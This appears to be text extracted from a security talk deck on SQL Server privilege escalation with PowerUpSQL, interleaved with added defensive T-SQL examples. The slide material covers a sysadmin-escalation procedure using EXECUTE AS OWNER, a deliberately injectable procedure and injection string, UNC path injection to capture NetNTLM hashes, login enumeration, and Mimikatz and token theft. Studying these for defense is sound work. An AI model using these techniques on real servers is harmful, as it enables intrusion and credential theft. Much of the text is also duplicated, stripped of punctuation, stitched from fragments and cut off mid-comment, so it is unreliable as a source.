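Two operational points follow from step 6: re-run ADD SIGNATURE after every ALTER PROCEDURE, and delete the exported .cer file once the login exists. The "granular control" pro on the slide is step 5: the certificate login holds exactly one permission, where EXECUTE AS OWNER would have handed over everything the owner has.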
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
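The same lookup written so that the caller's input is bound as a parameter instead of being concatenated into the query text, added here as an example and not part of the deck. sp_sqli2_fixed is a placeholder name; the two EXEC lines at the end are constructed inputs showing that a value which would have broken out of sp_sqli2's string now only ever acts as data.

```sql
-- Added hardened counterpart to sp_sqli2 (not the deck's code). Name is a placeholder.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname            -- sysname (nvarchar(128)) is the type of a database name
AS
BEGIN
    SET NOCOUNT ON;

    -- The SQL text is a constant; @pattern is a parameter of the batch, not text.
    DECLARE @query nvarchar(max) = N'
        SELECT name
        FROM   master.sys.databases
        WHERE  name LIKE ''%'' + @pattern + ''%''
           OR  name = N''tempdb'';';

    EXEC sys.sp_executesql
         @query,
         N'@pattern sysname',     -- parameter declaration for the dynamic batch
         @pattern = @DbName;      -- bound value, never parsed as SQL
END;
GO

-- Constructed inputs: an ordinary prefix, and a classic injection string.
EXEC dbo.sp_sqli2_fixed @DbName = N'temp';               -- matches tempdb
EXEC dbo.sp_sqli2_fixed @DbName = N'x'' OR 1=1--';      -- matches nothing; no database has that name
GO
```

This matters most when the procedure also carries WITH EXECUTE AS OWNER or a certificate signature, because then any text that does reach EXECUTE() runs with the elevated context the slide is about. Note that LIKE wildcards (% and _) inside the value still act as wildcards; that is a data-filtering question, not an injection.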
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts (four progressive builds of one diagram). Zones: Internet, DMZ, Intranet. Components: LRA, HVA, LVA, ADS; ports 80 and 443 into the DMZ, ports 1433 and 1434 into the intranet; attacker box labelled PURE EVIL (Captain Evil). Key: HVA = High Value Application, LVA = Low Value Application. Steps: 1) SQL Injection; 2) Execute local command via xp_cmdshell; 3) Access to HVA with shared domain service account: execute commands and gather data from other database servers via osql.]
Escalating Privileges
Crawling Server Links

Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database Links (four progressive builds of one diagram). Same zones, components, ports and key as the previous figure (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443; ports 1433 and 1434; HVA = High Value Application, LVA = Low Value Application; attacker Captain Evil, PURE EVIL). LVA database DB1 has a DB link with least privileges to the next server, which in turn has a DB link with the SA account to the HVA. Steps: 1) SQL Injection; 2) Execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
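The inventory a defender would take before an assessment finds the chain in the figure, added here as an example and not taken from the deck: every linked server on an instance and how each one maps local logins to remote logins. A row whose local login is "all local logins" and whose remote login is sa is the "DB link with SA account" from the diagram. LinkName, AppLogin, RemoteReadOnlyLogin and the password in the remediation are placeholders for this example.

```sql
-- Added defender's check (not the deck's code). sys.servers / sys.linked_logins
-- are standard catalog views; the names in the remediation are placeholders.
SELECT  s.name                         AS link_name,
        s.data_source,
        s.product,
        s.is_rpc_out_enabled,          -- RPC out lets EXEC ... AT link run procedures remotely
        s.is_data_access_enabled,      -- needed for OPENQUERY
        CASE ll.local_principal_id
             WHEN 0 THEN N'<all local logins>'   -- 0 = the default mapping for everyone
             ELSE SUSER_NAME(ll.local_principal_id)
        END                            AS local_login,
        CASE WHEN ll.uses_self_credential = 1 THEN N'<impersonate caller>'
             ELSE ll.remote_name
        END                            AS remote_login
FROM    sys.servers         AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- Remediation pattern for a link that maps every local login to a fixed
-- remote sysadmin: drop the catch-all mapping, then map only the login that
-- needs the link to a remote login holding the minimum rights.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LinkName', @locallogin = NULL;  -- NULL = the default (all logins) mapping
EXEC sp_addlinkedsrvlogin
     @rmtsrvname  = N'LinkName',
     @useself     = 'false',
     @locallogin  = N'AppLogin',
     @rmtuser     = N'RemoteReadOnlyLogin',
     @rmtpassword = N'Placeholder_Password_1!';
```

Run the SELECT on every instance and join the results on data_source to draw the same graph the crawl would: each link mapped to sa on a server that is itself reachable through a least-privilege link is a hop the public role can take.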
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts

Escalating Privileges: UNC Path Injection
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree, xp_fileexists

Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users

Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive

Escalating Privileges: UNC Path Injection
DEMO
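The corresponding check and fix on the server side, added here as an example and not part of the deck: who holds EXECUTE on the two file-path procedures in master, and the REVOKE that removes the default grant from public. The extended procedure the slide calls xp_fileexists is named xp_fileexist in SQL Server.

```sql
-- Added defender's check (not the deck's code). Catalog views and the
-- permission functions used are standard; no names here are invented.
USE master;
GO

-- 1. Explicit grants on the two procedures. A grantee of 'public' with
--    state GRANT is the default the slide describes.
SELECT  OBJECT_NAME(p.major_id)  AS procedure_name,
        pr.name                  AS grantee,
        p.permission_name,
        p.state_desc
FROM    sys.database_permissions AS p
JOIN    sys.database_principals  AS pr ON pr.principal_id = p.grantee_principal_id
WHERE   p.class = 1                                    -- object-level permissions
  AND   p.major_id IN (OBJECT_ID('sys.xp_dirtree'), OBJECT_ID('sys.xp_fileexist'))
ORDER BY procedure_name, grantee;

-- 2. Quick self-test when connected as an ordinary login: 1 = can execute.
SELECT  HAS_PERMS_BY_NAME('master.sys.xp_dirtree',   'OBJECT', 'EXECUTE') AS can_exec_xp_dirtree,
        HAS_PERMS_BY_NAME('master.sys.xp_fileexist', 'OBJECT', 'EXECUTE') AS can_exec_xp_fileexist;

-- 3. Remove the default grant. Sysadmins bypass the check and can still call
--    them; re-grant to a specific role only if an application needs it.
REVOKE EXECUTE ON OBJECT::sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::sys.xp_fileexist FROM public;
GO
```

The revoke closes the path that needs nothing but a login; it does not change what a sysadmin can do, and the capture-and-relay half of the slide is addressed on the network side, by requiring SMB signing so that a relayed authentication cannot be used.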
Escalating Privileges
OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Escalating Privileges: OS Admin to SysAdmin
Approach               2000   2005   2008   2012   2014   2016
LSA Secrets             x      x      x      x      x      x
Local Administrator     x      x
LocalSystem             x      x      x
Process Migration       x      x      x      x      x      x
Token Stealing          x      x      x      x      x      x
Single User Mode               x      x      x      x      x
Below are some options for leveraging that knowledge

Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach                                                       Common Tools
Access as Local Administrator                                  Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem                                          Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                               DBATools
Common Post Exploitation Activities

Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server Layer: startup procedures, agent jobs, triggers, modified code
   • OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
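The Luhn check from step 2, written in T-SQL and run over a constructed sample so the reader can see which values a data-discovery pass would flag, added here as an example and not the deck's or PowerUpSQL's code. The same test serves a defender classifying columns before an assessment. dbo.fn_LuhnValid and the sample table are placeholders; the two card numbers are the widely published test numbers, not real accounts.

```sql
-- Added example (not the deck's code): Luhn (mod 10) validation in T-SQL.
-- dbo.fn_LuhnValid is a placeholder name; the sample data below is constructed.
CREATE FUNCTION dbo.fn_LuhnValid (@digits varchar(32))
RETURNS bit
AS
BEGIN
    -- Only 13..19 decimal digits are worth checking; anything else is not a card number.
    IF @digits IS NULL OR LEN(@digits) NOT BETWEEN 13 AND 19 OR @digits LIKE '%[^0-9]%'
        RETURN 0;

    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;

    -- Walk right to left: double every second digit, subtract 9 when that exceeds 9.
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
        SET @sum = @sum + @d;
        SET @double = 1 - @double;     -- flip for the next digit
        SET @pos = @pos - 1;
    END;

    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Constructed sample: a published test card number, a near miss, a long
-- numeric id, a phone number, and a card number with spaces.
DECLARE @sample TABLE (column_name sysname, value nvarchar(64));
INSERT INTO @sample VALUES
    (N'cc_number', N'4111111111111111'),     -- Visa test number: passes Luhn
    (N'cc_number', N'4111111111111112'),     -- last digit changed: fails Luhn
    (N'order_id',  N'1234567890123'),        -- 13 digits, checksum fails
    (N'phone',     N'555-0100'),             -- too short once separators go: 0
    (N'cc_number', N'5555 5555 5555 4444');  -- Mastercard test number: passes after stripping spaces

-- Strip the separators people type into card fields before testing.
SELECT  column_name,
        value,
        dbo.fn_LuhnValid(REPLACE(REPLACE(value, ' ', ''), '-', '')) AS probable_card_number
FROM    @sample;
GO
```

Expected: only the two test card numbers return 1. In practice the function is applied to a sample of rows from columns that a keyword search (the previous bullet) has already shortlisted, since a scalar UDF over every row of a large table is slow and a checksum alone produces false positives on long numeric ids that happen to satisfy it.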
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues

• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution

Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
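The seven steps above carried through end to end, as an added example that is not from the original deck. It assumes SQL Server 2012 or later (CERTENCODED and CREATE CERTIFICATE ... FROM BINARY), a deployment run by a sysadmin, and placeholder names: MyAppDb, MyAppUser, MyAppSigningCert, MyAppSigningCertLogin, usp_get_server_state and the master key password.

```sql
-- Added example (not from the original deck): certificate-signed procedure in place of
-- EXECUTE AS OWNER. The database owner and TRUSTWORTHY are never involved.
USE MyAppDb;
GO

-- 1. The procedure that needs an elevated right. It runs as the caller; the extra right
--    comes only from the signature added in step 6.
CREATE PROCEDURE dbo.usp_get_server_state
AS
BEGIN
    SET NOCOUNT ON;
    -- Needs VIEW SERVER STATE, which the application user does not hold.
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END;
GO

-- 2. Database master key (placeholder password) and 3. a certificate in the application database.
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys WHERE name = '##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<placeholder-strong-password>';
GO
CREATE CERTIFICATE MyAppSigningCert
    WITH SUBJECT = 'Signs dbo.usp_get_server_state', EXPIRY_DATE = '2030-12-31';
GO

-- 4. Copy the public part of the certificate into master and create a login from it.
--    The login cannot connect; it exists only to carry permissions.
-- 5. Grant that login exactly the right the procedure needs, nothing else.
DECLARE @pub varbinary(max) = CERTENCODED(CERT_ID('MyAppSigningCert'));
DECLARE @sql nvarchar(max) = N'USE master;
    CREATE CERTIFICATE MyAppSigningCert FROM BINARY = ' + CONVERT(nvarchar(max), @pub, 1) + N';
    CREATE LOGIN MyAppSigningCertLogin FROM CERTIFICATE MyAppSigningCert;
    GRANT VIEW SERVER STATE TO MyAppSigningCertLogin;';
EXEC (@sql);
GO

-- 6. Sign the procedure. Any later ALTER of the procedure body invalidates the signature,
--    so an injected change to the code silently loses the elevated right instead of keeping it.
ADD SIGNATURE TO dbo.usp_get_server_state BY CERTIFICATE MyAppSigningCert;
GO

-- 7. The application user may only execute the procedure.
GRANT EXECUTE ON dbo.usp_get_server_state TO MyAppUser;
GO

-- Verification: TRUSTWORTHY stays off and the signature is in place.
SELECT name, is_trustworthy_on FROM sys.databases WHERE name = DB_NAME();
SELECT OBJECT_NAME(cp.major_id) AS signed_module, c.name AS certificate_name
FROM sys.crypt_properties cp
JOIN sys.certificates c ON c.thumbprint = cp.thumbprint
WHERE cp.class_desc = 'OBJECT_OR_COLUMN';
```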
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
AS
BEGIN
    Declare @query as varchar(max)
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
    EXECUTE(@query)
END
GO
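The same lookup as sp_sqli2 with the input passed as a parameter instead of being concatenated, added here as an example and not from the original deck. The procedure and login names (usp_find_databases_safe, MyAppUser) are placeholders.

```sql
-- Added example (not from the original deck): hardened version of the deck's sp_sqli2.
CREATE PROCEDURE dbo.usp_find_databases_safe
    @DbName sysname                 -- a name is 128 chars at most; varchar(max) invited scripts
AS
BEGIN
    SET NOCOUNT ON;

    -- Neutralise LIKE metacharacters so the input matches literally.
    DECLARE @pattern nvarchar(300) = @DbName;
    SET @pattern = REPLACE(@pattern, N'\', N'\\');
    SET @pattern = REPLACE(@pattern, N'%', N'\%');
    SET @pattern = REPLACE(@pattern, N'_', N'\_');
    SET @pattern = REPLACE(@pattern, N'[', N'\[');

    -- The statement text is a constant; user input never becomes part of it.
    DECLARE @query nvarchar(max) = N'
        SELECT name
        FROM master.sys.databases
        WHERE name LIKE N''%'' + @pattern + N''%'' ESCAPE N''\''
           OR name = N''tempdb'';';

    -- sp_executesql binds @pattern as a value, so a quote or comment sequence in @DbName
    -- is data, not code, and the OR 1=1 trick against sp_sqli2 has no effect here.
    EXEC sys.sp_executesql @query, N'@pattern nvarchar(300)', @pattern = @pattern;
END;
GO

-- The caller gets EXECUTE on this procedure only. No EXECUTE AS OWNER is needed:
-- sys.databases already shows a login just the databases it is permitted to see.
GRANT EXECUTE ON dbo.usp_find_databases_safe TO MyAppUser;   -- placeholder login
GO

-- Behaviour check with the kind of value that breaks sp_sqli2.
EXEC dbo.usp_find_databases_safe @DbName = N'master'' OR 1=1 --';
EXEC dbo.usp_find_databases_safe @DbName = N'mast';
```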
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them

One account to rule them all
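A per-instance check that makes the five points above measurable across a fleet, added here as an example and not from the original deck. It assumes SQL Server 2008 R2 SP1 or later (sys.dm_server_services); run it on every instance and compare the service_account column.

```sql
-- Added check (not from the original deck): which identity the engine runs as, whether that
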